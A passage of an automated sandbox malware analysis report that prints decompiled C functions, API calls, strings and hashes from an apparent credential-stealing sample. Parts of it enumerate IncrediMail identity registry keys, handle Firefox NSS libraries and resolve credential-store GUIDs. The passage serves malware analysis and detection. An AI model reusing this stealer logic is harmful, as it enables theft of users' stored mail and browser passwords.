                                                                                                                                                                        0x00403044
                                                                                                                                                                        0x00403057
                                                                                                                                                                        0x0040305c
                                                                                                                                                                        0x00403061
                                                                                                                                                                        0x0040306c
                                                                                                                                                                        0x0040306f
                                                                                                                                                                        0x00403075
                                                                                                                                                                        0x00403085
                                                                                                                                                                        0x0040308a
                                                                                                                                                                        0x004030b6
                                                                                                                                                                        0x00403099
                                                                                                                                                                        0x0040309e
                                                                                                                                                                        0x004030ae
                                                                                                                                                                        0x004030b3
                                                                                                                                                                        0x004030b3
                                                                                                                                                                        0x004030bd
                                                                                                                                                                        0x004030bd
                                                                                                                                                                        0x004030c3
                                                                                                                                                                        0x004030d3
                                                                                                                                                                        0x004030d8
                                                                                                                                                                        0x004030d8
                                                                                                                                                                        0x004030e6
                                                                                                                                                                        0x004030ec
                                                                                                                                                                        0x004030ed
                                                                                                                                                                        0x004030f6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                        • memset.MSVCRT ref: 00402FDF
                                                                                                                                                                          • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                        • memset.MSVCRT ref: 0040302C
                                                                                                                                                                        • sprintf.MSVCRT ref: 00403044
                                                                                                                                                                        • memset.MSVCRT ref: 00403075
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004030BD
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004030E6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                        • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                        • API String ID: 3672803090-3168940695
                                                                                                                                                                        • Opcode ID: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                                                                                                                                                                        • Instruction ID: 768b3681e431995c61ece500f3f0ca2292d3b8ebaed2eb0df27a6a0be2325633
                                                                                                                                                                        • Opcode Fuzzy Hash: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                                                                                                                                                                        • Instruction Fuzzy Hash: 27316FB680020DBFDB21EB51CC81EEE7B7CAF14344F0041B6B908A1151E7799F989F65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407BCE Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 48%
                                                                                                                                                                        			E00407BCE(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E00412360(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407BCE(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4181b4 =  *0x4181b4 + 1;
								_t64 =  *0x4181b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407EF3(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}











                                                                                                                                                                        0x00407bce
                                                                                                                                                                        0x00407bd1
                                                                                                                                                                        0x00407bd9
                                                                                                                                                                        0x00407be4
                                                                                                                                                                        0x00407bee
                                                                                                                                                                        0x00407bf2
                                                                                                                                                                        0x00407bf6
                                                                                                                                                                        0x00407d1c
                                                                                                                                                                        0x00407d22
                                                                                                                                                                        0x00407bfc
                                                                                                                                                                        0x00407c01
                                                                                                                                                                        0x00407c08
                                                                                                                                                                        0x00407c0d
                                                                                                                                                                        0x00407c14
                                                                                                                                                                        0x00407c23
                                                                                                                                                                        0x00407c2e
                                                                                                                                                                        0x00407c36
                                                                                                                                                                        0x00407c3a
                                                                                                                                                                        0x00407c46
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407c50
                                                                                                                                                                        0x00407cf4
                                                                                                                                                                        0x00407cf4
                                                                                                                                                                        0x00407cf8
                                                                                                                                                                        0x00407cfa
                                                                                                                                                                        0x00407cfb
                                                                                                                                                                        0x00407cff
                                                                                                                                                                        0x00407d02
                                                                                                                                                                        0x00407d07
                                                                                                                                                                        0x00407d07
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407cf8
                                                                                                                                                                        0x00407c56
                                                                                                                                                                        0x00407c64
                                                                                                                                                                        0x00407c6b
                                                                                                                                                                        0x00407c77
                                                                                                                                                                        0x00407c7c
                                                                                                                                                                        0x00407c83
                                                                                                                                                                        0x00407c87
                                                                                                                                                                        0x00407c8c
                                                                                                                                                                        0x00407c9a
                                                                                                                                                                        0x00407ca6
                                                                                                                                                                        0x00407ca6
                                                                                                                                                                        0x00407c8e
                                                                                                                                                                        0x00407c92
                                                                                                                                                                        0x00407c92
                                                                                                                                                                        0x00407c8c
                                                                                                                                                                        0x00407cb5
                                                                                                                                                                        0x00407cbd
                                                                                                                                                                        0x00407cbe
                                                                                                                                                                        0x00407cc4
                                                                                                                                                                        0x00407cd2
                                                                                                                                                                        0x00407cd8
                                                                                                                                                                        0x00407cd8
                                                                                                                                                                        0x00407cee
                                                                                                                                                                        0x00407cee
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407d0a
                                                                                                                                                                        0x00407d0a
                                                                                                                                                                        0x00407d0e
                                                                                                                                                                        0x00407d12
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407c01

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                                                                                                        • String ID: 0$6
                                                                                                                                                                        • API String ID: 1757351179-3849865405
                                                                                                                                                                        • Opcode ID: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                                                                                                                                                                        • Instruction ID: b54eda8ed3125ae11668051ec90bd02c66b6cc1d7fa6bc8d4742b266666783d1
                                                                                                                                                                        • Opcode Fuzzy Hash: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                                                                                                                                                                        • Instruction Fuzzy Hash: 01319E7280C384AFD7209F55D84099BBBE9FF88354F14893EF59492250D379EA44CB6B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040EFF9 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                                                                                                                                                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F02A
                                                                                                                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040F075
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                                                                                                                                                                        Strings
                                                                                                                                                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F025
                                                                                                                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F011
                                                                                                                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F01E
                                                                                                                                                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040F032
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                        • API String ID: 1640410171-2022683286
                                                                                                                                                                        • Opcode ID: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                                                                                                                                                                        • Instruction ID: b02d4c6ee9d97a63d35e72255114f680a0148db4ebcc5a4c1265e43ba903851c
                                                                                                                                                                        • Opcode Fuzzy Hash: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C115B7251012EAACB21EEA4DD40EFB37ECAB48354F050537FD41E3241EA74E9598BA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00404841 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E00404841(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                                        0x0040484e
                                                                                                                                                                        0x00404855
                                                                                                                                                                        0x0040485c
                                                                                                                                                                        0x0040485e
                                                                                                                                                                        0x00404866
                                                                                                                                                                        0x0040486a
                                                                                                                                                                        0x00404894
                                                                                                                                                                        0x00404894
                                                                                                                                                                        0x0040489c
                                                                                                                                                                        0x0040489d
                                                                                                                                                                        0x004048a2
                                                                                                                                                                        0x004048bf
                                                                                                                                                                        0x004048a4
                                                                                                                                                                        0x004048b1
                                                                                                                                                                        0x004048ba
                                                                                                                                                                        0x004048ba
                                                                                                                                                                        0x004048a2
                                                                                                                                                                        0x00404872
                                                                                                                                                                        0x0040487a
                                                                                                                                                                        0x00404880
                                                                                                                                                                        0x00404883
                                                                                                                                                                        0x00404883
                                                                                                                                                                        0x00404886
                                                                                                                                                                        0x0040488e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404890
                                                                                                                                                                        0x00404890
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404890

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404860
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404886
                                                                                                                                                                        • #17.COMCTL32(?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404894
                                                                                                                                                                        • MessageBoxA.USER32 ref: 004048B1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                        • API String ID: 2780580303-317687271
                                                                                                                                                                        • Opcode ID: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                                                                                                                                                                        • Instruction ID: fc2202cf77027b42572104eeb985269ec1b891a521d9ed4889cd7b549b4d3d81
                                                                                                                                                                        • Opcode Fuzzy Hash: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                                                                                                                                                                        • Instruction Fuzzy Hash: E001D6767906527BD7116FA09C4ABAF7EECDB85B4BB008435F602F1180EA78DE02825C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E507 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040E507() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}







                                                                                                                                                                        0x0040e51d
                                                                                                                                                                        0x0040e526
                                                                                                                                                                        0x0040e528
                                                                                                                                                                        0x0040e532
                                                                                                                                                                        0x0040e534
                                                                                                                                                                        0x0040e537
                                                                                                                                                                        0x0040e537
                                                                                                                                                                        0x0040e53b
                                                                                                                                                                        0x0040e53e
                                                                                                                                                                        0x0040e53e
                                                                                                                                                                        0x0040e542
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e545
                                                                                                                                                                        0x0040e54b

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(nss3.dll,73B757D0,?,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E516
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E51F
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E528
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E537
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E53E
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E545
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeHandleLibraryModule
                                                                                                                                                                        • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                                                                                        • API String ID: 662261464-3550686275
                                                                                                                                                                        • Opcode ID: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                                                                                                                                                                        • Instruction ID: d135409c02d172e6769d1cedb18aaef1940c31153c91c0802dc404148c0ad013
                                                                                                                                                                        • Opcode Fuzzy Hash: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                                                                                                                                                                        • Instruction Fuzzy Hash: 31E048E6B4133D7689106AF65C44DBBAE5CC885AE63150877AD0473284EEA99D0186F8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E7E3 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E0040E7E3(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E00406A01(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E0040632F( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E0040632F( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                                        0x0040e7e3
                                                                                                                                                                        0x0040e7e3
                                                                                                                                                                        0x0040e7f0
                                                                                                                                                                        0x0040e7fb
                                                                                                                                                                        0x0040e804
                                                                                                                                                                        0x0040e824
                                                                                                                                                                        0x0040e829
                                                                                                                                                                        0x0040e871
                                                                                                                                                                        0x0040e8ba
                                                                                                                                                                        0x0040e873
                                                                                                                                                                        0x0040e881
                                                                                                                                                                        0x0040e888
                                                                                                                                                                        0x0040e894
                                                                                                                                                                        0x0040e8a3
                                                                                                                                                                        0x0040e8aa
                                                                                                                                                                        0x0040e8ae
                                                                                                                                                                        0x0040e8b3
                                                                                                                                                                        0x0040e82b
                                                                                                                                                                        0x0040e839
                                                                                                                                                                        0x0040e840
                                                                                                                                                                        0x0040e84c
                                                                                                                                                                        0x0040e859
                                                                                                                                                                        0x0040e85e
                                                                                                                                                                        0x0040e864
                                                                                                                                                                        0x0040e869
                                                                                                                                                                        0x0040e8c2
                                                                                                                                                                        0x0040e8c5
                                                                                                                                                                        0x0040e8c5
                                                                                                                                                                        0x0040e807
                                                                                                                                                                        0x0040e808
                                                                                                                                                                        0x0040e809
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e80f
                                                                                                                                                                        0x0040e7f2
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • strchr.MSVCRT ref: 0040E7FB
                                                                                                                                                                        • strcpy.MSVCRT(?,-00000001), ref: 0040E809
                                                                                                                                                                          • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A13
                                                                                                                                                                          • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A1B
                                                                                                                                                                          • Part of subcall function 00406A01: _memicmp.MSVCRT ref: 00406A39
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E859
                                                                                                                                                                        • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E864
                                                                                                                                                                        • memset.MSVCRT ref: 0040E840
                                                                                                                                                                          • Part of subcall function 0040632F: GetWindowsDirectoryA.KERNEL32(00418550,00000104,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406344
                                                                                                                                                                          • Part of subcall function 0040632F: strcpy.MSVCRT(00000000,00418550,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406354
                                                                                                                                                                        • memset.MSVCRT ref: 0040E888
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040E8A3
                                                                                                                                                                        • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E8AE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                        • String ID: \systemroot
                                                                                                                                                                        • API String ID: 1680921474-1821301763
                                                                                                                                                                        • Opcode ID: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                                                                                                                                                                        • Instruction ID: 059b6355fafdf26fa7c647f60efba09ddadb95c968e3db809f61c631ea6cdf1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                                                                                                                                                                        • Instruction Fuzzy Hash: D321DA725082446DF764B2628D82FEB66EC5B19344F10446FF685E10C1EAFC99D4862A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405BEE Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E00405BEE(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
				GetWindow(GetWindow(_t32, 5), 0);
				do {
					__eax = E00401601(__edi, __esi);
					__edi = GetWindow(__edi, 2);
				} while (__edi != 0);
				__esi = GetDlgItem;
				__edi = 0x3ed;
				__eax = GetDlgItem( *(__ebx + 4), 0x3ed);
				"VWh\\MA"();
				 *__esp = 0x3ee;
				__eax = GetDlgItem( *(__ebx + 4), __eax);
				"VWh\\MA"();
				 *__esp = 0x3ef;
				__eax = GetDlgItem( *(__ebx + 4), __eax);
				"VWh\\MA"();
				 *__esp = 0x3f4;
				"VWh\\MA"();
				__eax =  *(__ebx + 4);
				__ecx = __eax;
				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
				_pop(__edi);
				_pop(__esi);
				__ecx = __ebx;
				_pop(__ebx);
				_t36 = _t27;
				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
				 *((intOrPtr*)( *_t36 + 0x18))();
				E0040649B(_t30,  *((intOrPtr*)(_t36 + 4)));
				return 0;
			}









                                                                                                                                                                        0x00405bee
                                                                                                                                                                        0x00405bee
                                                                                                                                                                        0x00405bee
                                                                                                                                                                        0x00405bf3
                                                                                                                                                                        0x00405bf4
                                                                                                                                                                        0x00405bf7
                                                                                                                                                                        0x00405c02
                                                                                                                                                                        0x00405c05
                                                                                                                                                                        0x00405c11
                                                                                                                                                                        0x00405c20
                                                                                                                                                                        0x00405c24
                                                                                                                                                                        0x00405c24
                                                                                                                                                                        0x00405c2e
                                                                                                                                                                        0x00405c30
                                                                                                                                                                        0x00405c34
                                                                                                                                                                        0x00405c3a
                                                                                                                                                                        0x00405c43
                                                                                                                                                                        0x00405c46
                                                                                                                                                                        0x00405c4b
                                                                                                                                                                        0x00405c55
                                                                                                                                                                        0x00405c58
                                                                                                                                                                        0x00405c5d
                                                                                                                                                                        0x00405c67
                                                                                                                                                                        0x00405c6a
                                                                                                                                                                        0x00405c6f
                                                                                                                                                                        0x00405c7c
                                                                                                                                                                        0x00405c81
                                                                                                                                                                        0x00405c84
                                                                                                                                                                        0x00405c8a
                                                                                                                                                                        0x00405c90
                                                                                                                                                                        0x00405c91
                                                                                                                                                                        0x00405c93
                                                                                                                                                                        0x00405c95
                                                                                                                                                                        0x004015e4
                                                                                                                                                                        0x004015ea
                                                                                                                                                                        0x004015f1
                                                                                                                                                                        0x004015f7
                                                                                                                                                                        0x00401600

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetClientRect.USER32 ref: 00405C05
                                                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00405C1D
                                                                                                                                                                        • GetWindow.USER32(00000000), ref: 00405C20
                                                                                                                                                                          • Part of subcall function 00401601: GetWindowRect.USER32 ref: 00401610
                                                                                                                                                                          • Part of subcall function 00401601: MapWindowPoints.USER32 ref: 0040162B
                                                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00405C2C
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405C43
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405C55
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405C67
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405C79
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405C87
                                                                                                                                                                        • SetFocus.USER32(00000000), ref: 00405C8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2187283481-0
                                                                                                                                                                        • Opcode ID: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                        • Instruction ID: 70b7e768433fb03072553d07e5bd29f06e019e0bb4b5ab736e3f65cd75bfe615
                                                                                                                                                                        • Opcode Fuzzy Hash: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                        • Instruction Fuzzy Hash: 09118271500304ABDB216F31CC89E5BBFADEF81715F05883AB444AB1A1CB7DD8018B28
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00401A0F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E00401A0F(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
